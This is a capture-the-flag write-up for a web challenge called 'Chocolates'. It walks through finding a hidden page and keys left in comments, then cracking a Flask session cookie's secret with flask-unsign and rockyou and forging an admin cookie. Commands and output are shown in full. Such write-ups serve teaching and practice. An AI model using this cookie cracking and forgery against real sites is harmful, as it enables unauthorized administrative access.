n00bz

Chocolates

Category

Web

Description

The first thing I want to give everyone is chocolate, of course. I found this wonderful company that sells the most exquisite chocolates, but I heard that they sell a super special secret valentine chocolate that’s hidden somewhere on their website. Here’s the website, do you think you can find it for me?

Solution

Entering the challenge page, we see a page for some chocolate store.

Taylor’s Chocolates

On the web page we can’t find anything interesting, so let’s check out the HTML.

In the navigation section of the page there’s a commented link.

<div class="head" style="text-align: center;">
    <!--<a class="head-cont nav-link" href="/hidden-page">Hidden Page</a> | -->
    <a class="head-cont nav-link" href="#milk-chocolates">Milk Chocolates</a> | 
    <a class="head-cont nav-link" href="#dark-chocolates">Dark Chocolates</a> |
    <a class="head-cont nav-link" href="#white-chocolates">White Chocolates</a> | 
    <a class="head-cont nav-link" href="#specialty-chocolates">Specialty Chocolates</a>
</div>

Going to /hidden-page we get a message that we need a key.

You need a key! message

Let’s take a look at the sources again to see if we can find the key.

After checking the soruces, we find a key in the /static/style.css file.

@import url('https://fonts.googleapis.com/css?family=Roboto:400,500,700,300');
@import url('https://fonts.googleapis.com/css2?family=Dancing+Script&display=swap');
@import url('https://fonts.googleapis.com/css2?family=Share+Tech+Mono&display=swap');

/* TEMP - here's a key in case i forget it: "?key=thedarkestchocolate" */

Using this key on the /hidden-page, we get a new page that asks us to verify that we are admin.

Cindy’s Chocolates

Clicking the verify link we get an image of an Among us impostor and a new address, /admin-check?key=anotherkeylol.

Impostor

Checking the cookies we find a flask session cookie, and checking the contents of the cookie we can see that it has an admin flag.

flask-unsign -d -c eyJhZG1pbiI6ImZhbHNlIiwidmlzaXRfdGltZSI6IjIwMjMtMDItMDEgMTk6NDA6MTcuMzIzNTQ2In0.Y9rAdw.X0Na0C2qE9jjX0ZyN6c75Lj89Kc
{'admin': 'false', 'visit_time': '2023-02-01 19:40:17.323546'}

So we need to forge the session cookie, let’s try to brute force the password using rockyou.

flask-unsign -u -c eyJhZG1pbiI6ImZhbHNlIiwidmlzaXRfdGltZSI6IjIwMjMtMDItMDEgMTk6NDA6MTcuMzIzNTQ2In0.Y9rAdw.X0Na0C2qE9jjX0ZyN6c75Lj89Kc --wordlist ~/wordlists/rockyou.txt --no-literal-eval
[*] Session decodes to: {'admin': 'false', 'visit_time': '2023-02-01 19:40:17.323546'}
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 11520 attempts
b'BATMAN'

Now we got the password for the session cookie, all we have to do now is to change the admin value to true and sign the cookie.

flask-unsign -s -S BATMAN -c "{'admin': 'true', 'visit_time': '2023-02-01 19:40:17.323546'}"
eyJhZG1pbiI6InRydWUiLCJ2aXNpdF90aW1lIjoiMjAyMy0wMi0wMSAxOTo0MDoxNy4zMjM1NDYifQ.Y9rBVQ.S58maENtJ9A68hJNqbODN0SpOd8

Using the forged token and entering the page /admin-check?key=anotherkeylol we get the flag.

Flag

n00bz

Home of the n00bz CTF team.

By n00bz, 2023-02-15